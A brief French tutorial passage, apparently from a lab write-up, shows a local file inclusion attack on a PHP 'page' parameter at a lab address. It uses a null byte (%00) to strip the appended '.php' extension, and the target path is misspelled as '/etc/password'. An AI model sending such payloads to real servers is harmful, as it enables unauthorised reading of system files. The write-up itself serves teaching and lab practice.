Plutot que http://10.10.10.11/index.php?page=login.php, le serveur utilise http://10.10.10.11/index.php?page=login, et ajoute l'extension '.php' avant d'inclure le fichier.

http://10.10.10.11/index.php?page=/etc/password va essayer d'ouvrir sans success /etc/password.php.

Nous ajoutons un null byte à la fin de notre paramètre qui va empécher l'ajout de l'extension .php.

http://10.10.10.11/index.php?page=/etc/password%00